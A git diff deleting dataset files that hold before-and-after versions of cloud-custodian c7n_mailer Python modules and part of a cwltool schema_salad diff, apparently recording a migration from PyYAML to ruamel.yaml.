b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.diff deleted file mode 100644 index 586ed14..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.diff +++ /dev/null @@ -1,13 +0,0 @@ -diff --git a/tools/c7n_mailer/c7n_mailer/replay.py b/tools/c7n_mailer/c7n_mailer/replay.py - index 00ac61b4840cc7bcbbc4304bc337ab2fd44f63e8..ee4d52689e1f4965439b2d360c89eddf8767a935 100644 - --- a/tools/c7n_mailer/c7n_mailer/replay.py - +++ b/tools/c7n_mailer/c7n_mailer/replay.py -@@ -18,7 +18,7 @@ import base64 - import json - - import jsonschema --import yaml -+from ruamel import yaml - - from c7n_mailer.utils import setup_defaults - from c7n_mailer.cli import CONFIG_SCHEMA diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.source.py b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.source.py deleted file mode 100644 index 23da2dc..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.source.py +++ /dev/null @@ -1,125 +0,0 @@ -""" -Allow local testing of mailer and templates by replaying an SQS message. - -MAILER_FILE input is a file containing the exact base64-encoded, gzipped -data that's enqueued to SQS via :py:meth:`c7n.actions.Notify.send_sqs`. - -Alternatively, with -p|--plain specified, the file will be assumed to be -JSON data that can be loaded directly. -""" -from __future__ import absolute_import, division, print_function, unicode_literals - -import argparse -import boto3 -import os -import logging -import zlib -import base64 -import json - -import jsonschema -import yaml - -from c7n_mailer.utils import setup_defaults -from c7n_mailer.cli import CONFIG_SCHEMA -from .email_delivery import EmailDelivery - -logger = logging.getLogger(__name__) - - -class MailerTester(object): - - def __init__(self, msg_file, config, msg_plain=False, json_dump_file=None): - if not os.path.exists(msg_file): - raise RuntimeError("File does not exist: %s" % msg_file) - logger.debug('Reading message from: %s', msg_file) - with open(msg_file, 'r') as fh: - raw = fh.read() - logger.debug('Read %d byte message', len(raw)) - if msg_plain: - raw = raw.strip() - else: - logger.debug('base64-decoding and zlib decompressing message') - raw = zlib.decompress(base64.b64decode(raw)) - if json_dump_file is not None: - with open(json_dump_file, 'w') as fh: - fh.write(raw) - self.data = json.loads(raw) - logger.debug('Loaded message JSON') - self.config = config - self.session = boto3.Session() - - def run(self, dry_run=False, print_only=False): - emd = EmailDelivery(self.config, self.session, logger) - addrs_to_msgs = emd.get_to_addrs_email_messages_map(self.data) - logger.info('Would send email to: %s', addrs_to_msgs.keys()) - if print_only: - mime = emd.get_mimetext_message( - self.data, self.data['resources'], ['foo@example.com'] - ) - logger.info('Send mail with subject: "%s"', mime['Subject']) - print(mime.get_payload()) - return - if dry_run: - for to_addrs, mimetext_msg in addrs_to_msgs.items(): - print('-> SEND MESSAGE TO: %s' % to_addrs) - print(mimetext_msg) - return - # else actually send the message... - for to_addrs, mimetext_msg in addrs_to_msgs.items(): - logger.info('Actually sending mail to: %s', to_addrs) - emd.send_c7n_email(self.data, list(to_addrs), mimetext_msg) - - -def setup_parser(): - parser = argparse.ArgumentParser('Test c7n-mailer templates and mail') - parser.add_argument('-c', '--config', required=True) - parser.add_argument('-d', '--dry-run', dest='dry_run', action='store_true', - default=False, - help='Log messages that would be sent, but do not send') - parser.add_argument('-t', '--template-print', dest='print_only', - action='store_true', default=False, - help='Just print rendered templates') - parser.add_argument('-p', '--plain', dest='plain', action='store_true', - default=False, - help='Expect MESSAGE_FILE to be a plain string, ' - 'rather than the base64-encoded, gzipped SQS ' - 'message format') - parser.add_argument('-j', '--json-dump-file', dest='json_dump_file', - type=str, action='store', default=None, - help='If dump JSON of MESSAGE_FILE to this path; ' - 'useful to base64-decode and gunzip a message') - parser.add_argument('MESSAGE_FILE', type=str, - help='Path to SQS message dump/content file') - return parser - - -def session_factory(config): - return boto3.Session( - region_name=config['region'], - profile_name=config.get('profile')) - - -def main(): - parser = setup_parser() - options = parser.parse_args() - - log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' - logging.basicConfig(level=logging.DEBUG, format=log_format) - logging.getLogger('botocore').setLevel(logging.WARNING) - - with open(options.config) as fh: - config = yaml.load(fh.read(), Loader=yaml.SafeLoader) - - jsonschema.validate(config, CONFIG_SCHEMA) - setup_defaults(config) - - tester = MailerTester( - options.MESSAGE_FILE, config, msg_plain=options.plain, - json_dump_file=options.json_dump_file - ) - tester.run(options.dry_run, options.print_only) - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.target.py b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.target.py deleted file mode 100644 index 3980ef6..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$replay.py.target.py +++ /dev/null @@ -1,125 +0,0 @@ -""" -Allow local testing of mailer and templates by replaying an SQS message. - -MAILER_FILE input is a file containing the exact base64-encoded, gzipped -data that's enqueued to SQS via :py:meth:`c7n.actions.Notify.send_sqs`. - -Alternatively, with -p|--plain specified, the file will be assumed to be -JSON data that can be loaded directly. -""" -from __future__ import absolute_import, division, print_function, unicode_literals - -import argparse -import boto3 -import os -import logging -import zlib -import base64 -import json - -import jsonschema -from ruamel import yaml - -from c7n_mailer.utils import setup_defaults -from c7n_mailer.cli import CONFIG_SCHEMA -from .email_delivery import EmailDelivery - -logger = logging.getLogger(__name__) - - -class MailerTester(object): - - def __init__(self, msg_file, config, msg_plain=False, json_dump_file=None): - if not os.path.exists(msg_file): - raise RuntimeError("File does not exist: %s" % msg_file) - logger.debug('Reading message from: %s', msg_file) - with open(msg_file, 'r') as fh: - raw = fh.read() - logger.debug('Read %d byte message', len(raw)) - if msg_plain: - raw = raw.strip() - else: - logger.debug('base64-decoding and zlib decompressing message') - raw = zlib.decompress(base64.b64decode(raw)) - if json_dump_file is not None: - with open(json_dump_file, 'w') as fh: - fh.write(raw) - self.data = json.loads(raw) - logger.debug('Loaded message JSON') - self.config = config - self.session = boto3.Session() - - def run(self, dry_run=False, print_only=False): - emd = EmailDelivery(self.config, self.session, logger) - addrs_to_msgs = emd.get_to_addrs_email_messages_map(self.data) - logger.info('Would send email to: %s', addrs_to_msgs.keys()) - if print_only: - mime = emd.get_mimetext_message( - self.data, self.data['resources'], ['foo@example.com'] - ) - logger.info('Send mail with subject: "%s"', mime['Subject']) - print(mime.get_payload()) - return - if dry_run: - for to_addrs, mimetext_msg in addrs_to_msgs.items(): - print('-> SEND MESSAGE TO: %s' % to_addrs) - print(mimetext_msg) - return - # else actually send the message... - for to_addrs, mimetext_msg in addrs_to_msgs.items(): - logger.info('Actually sending mail to: %s', to_addrs) - emd.send_c7n_email(self.data, list(to_addrs), mimetext_msg) - - -def setup_parser(): - parser = argparse.ArgumentParser('Test c7n-mailer templates and mail') - parser.add_argument('-c', '--config', required=True) - parser.add_argument('-d', '--dry-run', dest='dry_run', action='store_true', - default=False, - help='Log messages that would be sent, but do not send') - parser.add_argument('-t', '--template-print', dest='print_only', - action='store_true', default=False, - help='Just print rendered templates') - parser.add_argument('-p', '--plain', dest='plain', action='store_true', - default=False, - help='Expect MESSAGE_FILE to be a plain string, ' - 'rather than the base64-encoded, gzipped SQS ' - 'message format') - parser.add_argument('-j', '--json-dump-file', dest='json_dump_file', - type=str, action='store', default=None, - help='If dump JSON of MESSAGE_FILE to this path; ' - 'useful to base64-decode and gunzip a message') - parser.add_argument('MESSAGE_FILE', type=str, - help='Path to SQS message dump/content file') - return parser - - -def session_factory(config): - return boto3.Session( - region_name=config['region'], - profile_name=config.get('profile')) - - -def main(): - parser = setup_parser() - options = parser.parse_args() - - log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s' - logging.basicConfig(level=logging.DEBUG, format=log_format) - logging.getLogger('botocore').setLevel(logging.WARNING) - - with open(options.config) as fh: - config = yaml.load(fh.read(), Loader=yaml.SafeLoader) - - jsonschema.validate(config, CONFIG_SCHEMA) - setup_defaults(config) - - tester = MailerTester( - options.MESSAGE_FILE, config, msg_plain=options.plain, - json_dump_file=options.json_dump_file - ) - tester.run(options.dry_run, options.print_only) - - -if __name__ == '__main__': - main() diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.diff b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.diff deleted file mode 100644 index 0f5b285..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.diff +++ /dev/null @@ -1,46 +0,0 @@ -diff --git a/tools/c7n_mailer/c7n_mailer/utils.py b/tools/c7n_mailer/c7n_mailer/utils.py - index 00ac61b4840cc7bcbbc4304bc337ab2fd44f63e8..ee4d52689e1f4965439b2d360c89eddf8767a935 100644 - --- a/tools/c7n_mailer/c7n_mailer/utils.py - +++ b/tools/c7n_mailer/c7n_mailer/utils.py -@@ -11,13 +11,14 @@ - # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - # See the License for the specific language governing permissions and - # limitations under the License. -+from __future__ import absolute_import, division, print_function, unicode_literals -+ - import datetime - import jinja2 - import json - import os --import yaml -+from ruamel import yaml - --from io import StringIO - from dateutil import parser - from dateutil.tz import gettz - -@@ -92,6 +93,7 @@ def setup_defaults(config): - config.setdefault('region', 'us-east-1') - config.setdefault('ses_region', config.get('region')) - config.setdefault('memory', 1024) -+ config.setdefault('runtime', 'python2.7') - config.setdefault('timeout', 300) - config.setdefault('subnets', None) - config.setdefault('security_groups', None) -@@ -111,9 +113,7 @@ def get_date_time_delta(delta): - - - def format_struct(evt): -- buf = StringIO() -- json.dump(evt, buf, indent=2) -- return buf.getvalue() -+ return json.dumps(evt, indent=2, ensure_ascii=False) - - - def get_resource_tag_value(resource, k): -@@ -268,5 +268,4 @@ def resource_format(resource, resource_type): - resource['CreationDateTime'], - resource['TableStatus']) - else: -- print("Unknown resource type", resource_type) - return "%s" % format_struct(resource) diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.source.py b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.source.py deleted file mode 100644 index e593ffc..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.source.py +++ /dev/null @@ -1,272 +0,0 @@ -# Copyright 2015-2017 Capital One Services, LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -import datetime -import jinja2 -import json -import os -import yaml - -from io import StringIO -from dateutil import parser -from dateutil.tz import gettz - - -def get_jinja_env(): - env = jinja2.Environment(trim_blocks=True, autoescape=False) - env.filters['yaml_safe'] = yaml.safe_dump - env.filters['date_time_format'] = date_time_format - env.filters['get_date_time_delta'] = get_date_time_delta - env.globals['format_resource'] = resource_format - env.globals['format_struct'] = format_struct - env.globals['get_resource_tag_value'] = get_resource_tag_value - env.loader = jinja2.FileSystemLoader( - [ - os.path.abspath( - os.path.join( - os.path.dirname(os.path.abspath(__file__)), - '..', - 'msg-templates')), os.path.abspath('/') - ] - ) - return env - - -def get_rendered_jinja(target, sqs_message, resources, logger): - env = get_jinja_env() - mail_template = sqs_message['action'].get('template') - if not os.path.isabs(mail_template): - mail_template = '%s.j2' % mail_template - try: - template = env.get_template(mail_template) - except Exception as error_msg: - logger.error("Invalid template reference %s\n%s" % (mail_template, error_msg)) - return - rendered_jinja = template.render( - recipient=target, - resources=resources, - account=sqs_message.get('account', ''), - event=sqs_message.get('event', None), - action=sqs_message['action'], - policy=sqs_message['policy'], - region=sqs_message.get('region', '')) - return rendered_jinja - - -# eg, target_tag_keys could be resource-owners ['Owners', 'SupportTeam'] -# and this function would go through the resource and look for any tag keys -# that match Owners or SupportTeam, and return those values as targets -def get_resource_tag_targets(resource, target_tag_keys): - if 'Tags' not in resource: - return [] - tags = {tag['Key']: tag['Value'] for tag in resource['Tags']} - targets = [] - for target_tag_key in target_tag_keys: - if target_tag_key in tags: - targets.append(tags[target_tag_key]) - return targets - - -def get_message_subject(sqs_message): - default_subject = 'Custodian notification - %s' % (sqs_message['policy']['name']) - subject = sqs_message['action'].get('subject', default_subject) - jinja_template = jinja2.Template(subject) - subject = jinja_template.render( - account=sqs_message.get('account', ''), - region=sqs_message.get('region', '') - ) - return subject - - -def setup_defaults(config): - config.setdefault('region', 'us-east-1') - config.setdefault('ses_region', config.get('region')) - config.setdefault('memory', 1024) - config.setdefault('timeout', 300) - config.setdefault('subnets', None) - config.setdefault('security_groups', None) - config.setdefault('contact_tags', []) - config.setdefault('ldap_uri', None) - config.setdefault('ldap_bind_dn', None) - config.setdefault('ldap_bind_user', None) - config.setdefault('ldap_bind_password', None) - - -def date_time_format(utc_str, tz_str='US/Eastern', format='%Y %b %d %H:%M %Z'): - return parser.parse(utc_str).astimezone(gettz(tz_str)).strftime(format) - - -def get_date_time_delta(delta): - return str(datetime.datetime.now().replace(tzinfo=gettz('UTC')) + datetime.timedelta(delta)) - - -def format_struct(evt): - buf = StringIO() - json.dump(evt, buf, indent=2) - return buf.getvalue() - - -def get_resource_tag_value(resource, k): - for t in resource.get('Tags', []): - if t['Key'] == k: - return t['Value'] - return '' - - -def resource_format(resource, resource_type): - if resource_type == 'ec2': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - return "%s %s %s %s %s %s" % ( - resource['InstanceId'], - resource.get('VpcId', 'NO VPC!'), - resource['InstanceType'], - resource.get('LaunchTime'), - tag_map.get('Name', ''), - resource.get('PrivateIpAddress')) - elif resource_type == 'ami': - return "%s %s %s" % ( - resource['Name'], resource['ImageId'], resource['CreationDate']) - elif resource_type == 's3': - return "%s" % (resource['Name']) - elif resource_type == 'ebs': - return "%s %s %s %s" % ( - resource['VolumeId'], - resource['Size'], - resource['State'], - resource['CreateTime']) - elif resource_type == 'rds': - return "%s %s %s %s" % ( - resource['DBInstanceIdentifier'], - "%s-%s" % ( - resource['Engine'], resource['EngineVersion']), - resource['DBInstanceClass'], - resource['AllocatedStorage']) - elif resource_type == 'asg': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - return "%s %s %s" % ( - resource['AutoScalingGroupName'], - tag_map.get('Name', ''), - "instances: %d" % (len(resource.get('Instances', [])))) - elif resource_type == 'elb': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - if 'ProhibitedPolicies' in resource: - return "%s %s %s %s" % ( - resource['LoadBalancerName'], - "instances: %d" % len(resource['Instances']), - "zones: %d" % len(resource['AvailabilityZones']), - "prohibited_policies: %s" % ','.join( - resource['ProhibitedPolicies'])) - return "%s %s %s" % ( - resource['LoadBalancerName'], - "instances: %d" % len(resource['Instances']), - "zones: %d" % len(resource['AvailabilityZones'])) - elif resource_type == 'redshift': - return "%s %s %s" % ( - resource['ClusterIdentifier'], - 'nodes:%d' % len(resource['ClusterNodes']), - 'encrypted:%s' % resource['Encrypted']) - elif resource_type == 'emr': - return "%s status:%s" % ( - resource['Id'], - resource['Status']['State']) - elif resource_type == 'cfn': - return "%s" % ( - resource['StackName']) - elif resource_type == 'launch-config': - return "%s" % ( - resource['LaunchConfigurationName']) - elif resource_type == 'security-group': - name = resource.get('GroupName', '') - for t in resource.get('Tags', ()): - if t['Key'] == 'Name': - name = t['Value'] - return "%s %s %s inrules: %d outrules: %d" % ( - name, - resource['GroupId'], - resource.get('VpcId', 'na'), - len(resource.get('IpPermissions', ())), - len(resource.get('IpPermissionsEgress', ()))) - elif resource_type == 'log-group': - if 'lastWrite' in resource: - return "name: %s last_write: %s" % ( - resource['logGroupName'], - resource['lastWrite']) - return "name: %s" % (resource['logGroupName']) - elif resource_type == 'cache-cluster': - return "name: %s created: %s status: %s" % ( - resource['CacheClusterId'], - resource['CacheClusterCreateTime'], - resource['CacheClusterStatus']) - elif resource_type == 'cache-snapshot': - return "name: %s cluster: %s source: %s" % ( - resource['SnapshotName'], - resource['CacheClusterId'], - resource['SnapshotSource']) - elif resource_type == 'redshift-snapshot': - return "name: %s db: %s" % ( - resource['SnapshotIdentifier'], - resource['DBName']) - elif resource_type == 'ebs-snapshot': - return "name: %s date: %s" % ( - resource['SnapshotId'], - resource['StartTime']) - elif resource_type == 'subnet': - return "%s %s %s %s %s %s" % ( - resource['SubnetId'], - resource['VpcId'], - resource['AvailabilityZone'], - resource['State'], - resource['CidrBlock'], - resource['AvailableIpAddressCount']) - elif resource_type == 'account': - return " %s %s" % ( - resource['account_id'], - resource['account_name']) - elif resource_type == 'cloudtrail': - return " %s %s" % ( - resource['account_id'], - resource['account_name']) - elif resource_type == 'vpc': - return "%s " % ( - resource['VpcId']) - elif resource_type == 'iam-group': - return " %s %s %s" % ( - resource['GroupName'], - resource['Arn'], - resource['CreateDate']) - elif resource_type == 'rds-snapshot': - return " %s %s %s" % ( - resource['DBSnapshotIdentifier'], - resource['DBInstanceIdentifier'], - resource['SnapshotCreateTime']) - elif resource_type == 'iam-user': - return " %s " % ( - resource['UserName']) - elif resource_type == 'iam-role': - return " %s %s " % ( - resource['RoleName'], - resource['CreateDate']) - elif resource_type == 'iam-policy': - return " %s " % ( - resource['PolicyName']) - elif resource_type == 'iam-profile': - return " %s " % ( - resource['InstanceProfileId']) - elif resource_type == 'dynamodb-table': - return "name: %s created: %s status: %s" % ( - resource['TableName'], - resource['CreationDateTime'], - resource['TableStatus']) - else: - print("Unknown resource type", resource_type) - return "%s" % format_struct(resource) diff --git a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.target.py b/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.target.py deleted file mode 100644 index 8178f25..0000000 --- a/v1/data/codefile/cloud-custodian@cloud-custodian__ee4d526__tools$c7n_mailer$c7n_mailer$utils.py.target.py +++ /dev/null @@ -1,271 +0,0 @@ -# Copyright 2015-2017 Capital One Services, LLC -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -from __future__ import absolute_import, division, print_function, unicode_literals - -import datetime -import jinja2 -import json -import os -from ruamel import yaml - -from dateutil import parser -from dateutil.tz import gettz - - -def get_jinja_env(): - env = jinja2.Environment(trim_blocks=True, autoescape=False) - env.filters['yaml_safe'] = yaml.safe_dump - env.filters['date_time_format'] = date_time_format - env.filters['get_date_time_delta'] = get_date_time_delta - env.globals['format_resource'] = resource_format - env.globals['format_struct'] = format_struct - env.globals['get_resource_tag_value'] = get_resource_tag_value - env.loader = jinja2.FileSystemLoader( - [ - os.path.abspath( - os.path.join( - os.path.dirname(os.path.abspath(__file__)), - '..', - 'msg-templates')), os.path.abspath('/') - ] - ) - return env - - -def get_rendered_jinja(target, sqs_message, resources, logger): - env = get_jinja_env() - mail_template = sqs_message['action'].get('template') - if not os.path.isabs(mail_template): - mail_template = '%s.j2' % mail_template - try: - template = env.get_template(mail_template) - except Exception as error_msg: - logger.error("Invalid template reference %s\n%s" % (mail_template, error_msg)) - return - rendered_jinja = template.render( - recipient=target, - resources=resources, - account=sqs_message.get('account', ''), - event=sqs_message.get('event', None), - action=sqs_message['action'], - policy=sqs_message['policy'], - region=sqs_message.get('region', '')) - return rendered_jinja - - -# eg, target_tag_keys could be resource-owners ['Owners', 'SupportTeam'] -# and this function would go through the resource and look for any tag keys -# that match Owners or SupportTeam, and return those values as targets -def get_resource_tag_targets(resource, target_tag_keys): - if 'Tags' not in resource: - return [] - tags = {tag['Key']: tag['Value'] for tag in resource['Tags']} - targets = [] - for target_tag_key in target_tag_keys: - if target_tag_key in tags: - targets.append(tags[target_tag_key]) - return targets - - -def get_message_subject(sqs_message): - default_subject = 'Custodian notification - %s' % (sqs_message['policy']['name']) - subject = sqs_message['action'].get('subject', default_subject) - jinja_template = jinja2.Template(subject) - subject = jinja_template.render( - account=sqs_message.get('account', ''), - region=sqs_message.get('region', '') - ) - return subject - - -def setup_defaults(config): - config.setdefault('region', 'us-east-1') - config.setdefault('ses_region', config.get('region')) - config.setdefault('memory', 1024) - config.setdefault('runtime', 'python2.7') - config.setdefault('timeout', 300) - config.setdefault('subnets', None) - config.setdefault('security_groups', None) - config.setdefault('contact_tags', []) - config.setdefault('ldap_uri', None) - config.setdefault('ldap_bind_dn', None) - config.setdefault('ldap_bind_user', None) - config.setdefault('ldap_bind_password', None) - - -def date_time_format(utc_str, tz_str='US/Eastern', format='%Y %b %d %H:%M %Z'): - return parser.parse(utc_str).astimezone(gettz(tz_str)).strftime(format) - - -def get_date_time_delta(delta): - return str(datetime.datetime.now().replace(tzinfo=gettz('UTC')) + datetime.timedelta(delta)) - - -def format_struct(evt): - return json.dumps(evt, indent=2, ensure_ascii=False) - - -def get_resource_tag_value(resource, k): - for t in resource.get('Tags', []): - if t['Key'] == k: - return t['Value'] - return '' - - -def resource_format(resource, resource_type): - if resource_type == 'ec2': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - return "%s %s %s %s %s %s" % ( - resource['InstanceId'], - resource.get('VpcId', 'NO VPC!'), - resource['InstanceType'], - resource.get('LaunchTime'), - tag_map.get('Name', ''), - resource.get('PrivateIpAddress')) - elif resource_type == 'ami': - return "%s %s %s" % ( - resource['Name'], resource['ImageId'], resource['CreationDate']) - elif resource_type == 's3': - return "%s" % (resource['Name']) - elif resource_type == 'ebs': - return "%s %s %s %s" % ( - resource['VolumeId'], - resource['Size'], - resource['State'], - resource['CreateTime']) - elif resource_type == 'rds': - return "%s %s %s %s" % ( - resource['DBInstanceIdentifier'], - "%s-%s" % ( - resource['Engine'], resource['EngineVersion']), - resource['DBInstanceClass'], - resource['AllocatedStorage']) - elif resource_type == 'asg': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - return "%s %s %s" % ( - resource['AutoScalingGroupName'], - tag_map.get('Name', ''), - "instances: %d" % (len(resource.get('Instances', [])))) - elif resource_type == 'elb': - tag_map = {t['Key']: t['Value'] for t in resource.get('Tags', ())} - if 'ProhibitedPolicies' in resource: - return "%s %s %s %s" % ( - resource['LoadBalancerName'], - "instances: %d" % len(resource['Instances']), - "zones: %d" % len(resource['AvailabilityZones']), - "prohibited_policies: %s" % ','.join( - resource['ProhibitedPolicies'])) - return "%s %s %s" % ( - resource['LoadBalancerName'], - "instances: %d" % len(resource['Instances']), - "zones: %d" % len(resource['AvailabilityZones'])) - elif resource_type == 'redshift': - return "%s %s %s" % ( - resource['ClusterIdentifier'], - 'nodes:%d' % len(resource['ClusterNodes']), - 'encrypted:%s' % resource['Encrypted']) - elif resource_type == 'emr': - return "%s status:%s" % ( - resource['Id'], - resource['Status']['State']) - elif resource_type == 'cfn': - return "%s" % ( - resource['StackName']) - elif resource_type == 'launch-config': - return "%s" % ( - resource['LaunchConfigurationName']) - elif resource_type == 'security-group': - name = resource.get('GroupName', '') - for t in resource.get('Tags', ()): - if t['Key'] == 'Name': - name = t['Value'] - return "%s %s %s inrules: %d outrules: %d" % ( - name, - resource['GroupId'], - resource.get('VpcId', 'na'), - len(resource.get('IpPermissions', ())), - len(resource.get('IpPermissionsEgress', ()))) - elif resource_type == 'log-group': - if 'lastWrite' in resource: - return "name: %s last_write: %s" % ( - resource['logGroupName'], - resource['lastWrite']) - return "name: %s" % (resource['logGroupName']) - elif resource_type == 'cache-cluster': - return "name: %s created: %s status: %s" % ( - resource['CacheClusterId'], - resource['CacheClusterCreateTime'], - resource['CacheClusterStatus']) - elif resource_type == 'cache-snapshot': - return "name: %s cluster: %s source: %s" % ( - resource['SnapshotName'], - resource['CacheClusterId'], - resource['SnapshotSource']) - elif resource_type == 'redshift-snapshot': - return "name: %s db: %s" % ( - resource['SnapshotIdentifier'], - resource['DBName']) - elif resource_type == 'ebs-snapshot': - return "name: %s date: %s" % ( - resource['SnapshotId'], - resource['StartTime']) - elif resource_type == 'subnet': - return "%s %s %s %s %s %s" % ( - resource['SubnetId'], - resource['VpcId'], - resource['AvailabilityZone'], - resource['State'], - resource['CidrBlock'], - resource['AvailableIpAddressCount']) - elif resource_type == 'account': - return " %s %s" % ( - resource['account_id'], - resource['account_name']) - elif resource_type == 'cloudtrail': - return " %s %s" % ( - resource['account_id'], - resource['account_name']) - elif resource_type == 'vpc': - return "%s " % ( - resource['VpcId']) - elif resource_type == 'iam-group': - return " %s %s %s" % ( - resource['GroupName'], - resource['Arn'], - resource['CreateDate']) - elif resource_type == 'rds-snapshot': - return " %s %s %s" % ( - resource['DBSnapshotIdentifier'], - resource['DBInstanceIdentifier'], - resource['SnapshotCreateTime']) - elif resource_type == 'iam-user': - return " %s " % ( - resource['UserName']) - elif resource_type == 'iam-role': - return " %s %s " % ( - resource['RoleName'], - resource['CreateDate']) - elif resource_type == 'iam-policy': - return " %s " % ( - resource['PolicyName']) - elif resource_type == 'iam-profile': - return " %s " % ( - resource['InstanceProfileId']) - elif resource_type == 'dynamodb-table': - return "name: %s created: %s status: %s" % ( - resource['TableName'], - resource['CreationDateTime'], - resource['TableStatus']) - else: - return "%s" % format_struct(resource) diff --git a/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.diff b/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.diff deleted file mode 100644 index 04b6f33..0000000 --- a/v1/data/codefile/common-workflow-language@cwltool__b9b65c0__draft-4$salad$schema_salad$jsonld_context.py.diff +++ /dev/null @@ -1,180 +0,0 @@ -diff --git a/draft-4/salad/schema_salad/jsonld_context.py b/draft-4/salad/schema_salad/jsonld_context.py - index 4cadc611dfced4e1a818e6afbb215270fc2561b3..b9b65c0f4d7531c8a97690356ecf1a34214eaac2 100644 - --- a/draft-4/salad/schema_salad/jsonld_context.py - +++ b/draft-4/salad/schema_salad/jsonld_context.py -@@ -1,6 +1,11 @@ -+import collections - import shutil - import json --import yaml -+import ruamel.yaml as yaml -+try: -+ from ruamel.yaml import CSafeLoader as SafeLoader -+except ImportError: -+ from ruamel.yaml import SafeLoader # type: ignore - import os - import subprocess - import copy -@@ -11,62 +16,74 @@ import rdflib - from rdflib import Graph, URIRef - import rdflib.namespace - from rdflib.namespace import RDF, RDFS --try: -- import urlparse --except ImportError: -- import urllib.parse as urlparse -- unicode=str -- basestring=str -+import urlparse - import logging - from .aslist import aslist --if sys.version_info >= (2,7): -- import typing -+from typing import Any, cast, Dict, Iterable, Tuple, Union -+from .ref_resolver import Loader - - _logger = logging.getLogger("salad") - -+ - def pred(datatype, field, name, context, defaultBase, namespaces): -+ # type: (Dict[str, Union[Dict, str]], Dict, str, Loader.ContextType, str, Dict[str, rdflib.namespace.Namespace]) -> Union[Dict, str] - split = urlparse.urlsplit(name) - -- v = None -+ vee = None # type: Union[str, unicode] - - if split.scheme: -- v = name -- (ns, ln) = rdflib.namespace.split_uri(unicode(v)) -+ vee = name -+ (ns, ln) = rdflib.namespace.split_uri(unicode(vee)) - name = ln - if ns[0:-1] in namespaces: -- v = unicode(namespaces[ns[0:-1]][ln]) -- _logger.debug("name, v %s %s", name, v) -+ vee = unicode(namespaces[ns[0:-1]][ln]) -+ _logger.debug("name, v %s %s", name, vee) -+ -+ v = None # type: Any - - if field and "jsonldPredicate" in field: - if isinstance(field["jsonldPredicate"], dict): - v = {} - for k, val in field["jsonldPredicate"].items(): -- v[("@"+k[1:] if k.startswith("_") else k)] = val -+ v[("@" + k[1:] if k.startswith("_") else k)] = val - else: - v = field["jsonldPredicate"] - elif "jsonldPredicate" in datatype: -- for d in datatype["jsonldPredicate"]: -- if d["symbol"] == name: -- v = d["predicate"] -+ if isinstance(datatype["jsonldPredicate"], collections.Iterable): -+ for d in datatype["jsonldPredicate"]: -+ if isinstance(d, dict): -+ if d["symbol"] == name: -+ v = d["predicate"] -+ else: -+ raise Exception( -+ "entries in the jsonldPredicate List must be " -+ "Dictionaries") -+ else: -+ raise Exception("jsonldPredicate must be a List of Dictionaries.") - # if not v: - # if field and "jsonldPrefix" in field: - # defaultBase = field["jsonldPrefix"] - # elif "jsonldPrefix" in datatype: - # defaultBase = datatype["jsonldPrefix"] - -- if not v: -- v = defaultBase + name -+ ret = v or vee -+ -+ if not ret: -+ ret = defaultBase + name - - if name in context: -- if context[name] != v: -- raise Exception("Predicate collision on %s, '%s' != '%s'" % (name, context[name], v)) -+ if context[name] != ret: -+ raise Exception("Predicate collision on %s, '%s' != '%s'" % -+ (name, context[name], ret)) - else: -- _logger.debug("Adding to context '%s' %s (%s)", name, v, type(v)) -- context[name] = v -+ _logger.debug("Adding to context '%s' %s (%s)", name, ret, type(ret)) -+ context[name] = ret -+ -+ return ret - -- return v - - def process_type(t, g, context, defaultBase, namespaces, defaultPrefix): -+ # type: 